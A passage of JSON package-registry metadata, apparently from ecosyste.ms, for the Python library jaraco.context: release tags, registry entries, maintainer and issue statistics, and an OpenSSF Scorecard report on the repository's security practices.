ub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.543Z","dependent_packages_count":2,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":12.044374009508717,"stargazers_count":21.740916828080064,"forks_count":21.605916534601164,"average":13.847801843047487},"purl":"pkg:apk/alpine/py3-jaraco.context?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.16","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-jaraco.context/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":1944,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2023-02-01T14:14:26.741Z","updated_at":"2023-02-01T14:14:26.741Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.16","url":"https://pkgs.alpinelinux.org/packages?branch=v3.16","ecosystem":"alpine","default":false,"packages_count":17040,"maintainers_count":328,"namespaces_count":2,"keywords_count":2855,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":947},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.662Z","updated_at":"2026-08-22T05:05:52.310Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/namespaces"}},{"id":5298139,"name":"jaraco.context","ecosystem":"conda","description":null,"homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2022-03-07T12:53:50.000Z","latest_release_published_at":"2022-07-18T20:23:57.000Z","latest_release_number":"4.1.2","last_synced_at":"2026-07-27T11:02:54.483Z","created_at":"2022-10-03T16:03:35.331Z","updated_at":"2026-08-06T19:26:18.557Z","registry_url":"https://anaconda.org/conda-forge/jaraco.context","install_command":"conda install -c conda-forge jaraco.context","documentation_url":null,"metadata":{},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0